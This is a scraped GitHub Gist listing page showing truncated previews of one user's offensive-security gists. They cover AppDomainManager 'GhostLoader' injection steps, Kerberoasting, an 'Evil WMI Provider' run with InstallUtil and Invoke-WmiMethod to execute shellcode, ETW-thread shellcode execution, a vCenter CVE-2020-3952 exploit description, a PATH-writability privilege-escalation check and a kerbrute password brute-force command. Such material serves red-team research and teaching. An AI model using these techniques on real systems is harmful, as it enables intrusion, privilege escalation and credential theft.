GhostLoader Steps :)
1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
Tim McGuffin NotMedic
NotMedic
/ Invoke-Kerberoast.ps1
Created
May 6, 2021 21:12
— forked from jaredhaight/Invoke-Kerberoast.ps1
Get Kerberoastable SPNs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Invoke-Kerberoast.ps1 | |
| Author: Will Schroeder (@harmj0y), @machosec | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Credit to Tim Medin (@TimMedin) for the Kerberoasting concept and original toolset implementation (https://github.com/nidem/kerberoast). | |
| Note: the primary method of use will be Invoke-Kerberoast with various targeting options. |
NotMedic
/ Get-KerberosTicketGrantingTicket.ps1
Created
July 2, 2020 15:34
— forked from jaredcatkinson/Get-KerberosTicketGrantingTicket.ps1
Kerberos Ticket Granting Ticket Collection Script and Golden Ticket Detection Tests
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-KerberosTicketGrantingTicket | |
| { | |
| <# | |
| .SYNOPSIS | |
| Gets the Kerberos Tickets Granting Tickets from all Logon Sessions | |
| .DESCRIPTION | |
| Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets. |
NotMedic
/ EvilWMIProvider.cs
Created
May 18, 2020 14:35
— forked from TheWover/EvilWMIProvider.cs
Evil WMI Provider
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Based On LocalAdmin WMI Provider by Roger Zander | |
| // http://myitforum.com/cs2/blogs/rzander/archive/2008/08/12/how-to-create-a-wmiprovider-with-c.aspx | |
| // Adapted For Evil By @subTee | |
| // Executes x64 ShellCode | |
| // | |
| // Deliver and Install dll | |
| // C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /i EvilWMIProvider.dll | |
| // Invoke calc for SYSTEM level calculations | |
| // Invoke-WmiMethod -Class Win32_Evil -Name ExecShellCalcCode | |
| // Invoke-WmiMethod -Namespace root\cimv2 -Class Win32_Evil -Name ExecShellCode -ArgumentList @(0x90,0x90,0x90), $null |
NotMedic
/ EtwpTest.cs
Created
May 15, 2020 17:14
Demonstrates using ntdll.dll!EtwpCreateThreadEtw for local shellcode execution.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace EtwpTest | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { |
NotMedic
/ _Instructions_Reproduce.md
Created
May 15, 2020 17:12
GhostLoader - AppDomainManager - Injection - 攻壳机动队
NotMedic
/ _vmdir-exploit.md
Created
April 28, 2020 14:00
— forked from praseodym/_vmdir-exploit.md
Exploit for VMware vCenter Directory Service (vmdir) - CVE-2020-3952 / VMSA-2020-0006
This is my proof-of-concept exploit code for the VMware vCenter Directory Service (vmdir) sensitive information disclosure vulnerability (CVE-2020-3952 / VMSA-2020-0006).
It turns out that the vmdir service, which provides an LDAP directory server (and more), allows anonymous LDAP connections (also called LDAP binding) in the ACL MODE: Legacy configuration that is present
after upgrading from vCenter 6.5. While the LDAP tree doesn't expose password
hashes for administrative users, it does expose the VMware SSO server's SAML identity provider (IdP) certificates
and private key. This key can be downloaded and used to sign arbitrary SAML responses, allowing an attacker to
NotMedic
/ acltest.ps1
Created
April 2, 2020 17:18
— forked from wdormann/acltest.ps1
Check for paths that are writable by normal users, but are in the system-wide Windows path. Any such directory allows for privilege escalation.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| If (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { | |
| Write-Warning "This script will not function with administrative privileges. Please run as a normal user." | |
| Break | |
| } | |
| $outfile = "acltestfile" | |
| set-variable -name paths -value (Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment' -Name PATH).path.Split(";") | |
| Foreach ($path in $paths) { | |
| # This prints a table of ACLs | |
| # get-acl $path | %{ $_.Access } | ft -Wrap -AutoSize -property IdentityReference, AccessControlType, FileSystemRights |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Windows\\System32\\Tasks'; | |
| //new ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_ASM') = "mydll, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null" | |
| //new ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_TYPE') = "MyAppDomainManager"; | |
| new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319'; | |
| var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?><assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3"> <dependency><dependentAssembly> <assemblyIdentity name="tasks" version="0.0.0.0"/> </dependentAssembly> </dependency> <assemblyIdentity name="tasks" type="win32" version="0.0.0.0" /><description>Built with love by Casey Smith @subTee </description><clrClass name="MyDLL.Operations" clsid="{31D2B969-7608-426E-9D8E-A09FC9A5ACDC}" progid="MyDLL.Operations" ru |
NotMedic
/ snippet.cs
Created
March 24, 2020 23:55
— forked from silentbreaksec/snippet.cs
Convert C# EXE to Assembly
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [DllImport("shell32.dll", SetLastError = true)] | |
| static extern IntPtr CommandLineToArgvW([MarshalAs(UnmanagedType.LPWStr)] string lpCmdLine, out int pNumArgs); | |
| public static string[] CommandLineToArgs(string commandLine) | |
| { | |
| int argc; | |
| var argv = CommandLineToArgvW(commandLine, out argc); | |
| if (argv == IntPtr.Zero) | |
| throw new System.ComponentModel.Win32Exception(); | |
| try |
NotMedic
/ kerberos_attacks_cheatsheet.md
Created
January 15, 2020 19:56
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
NewerOlder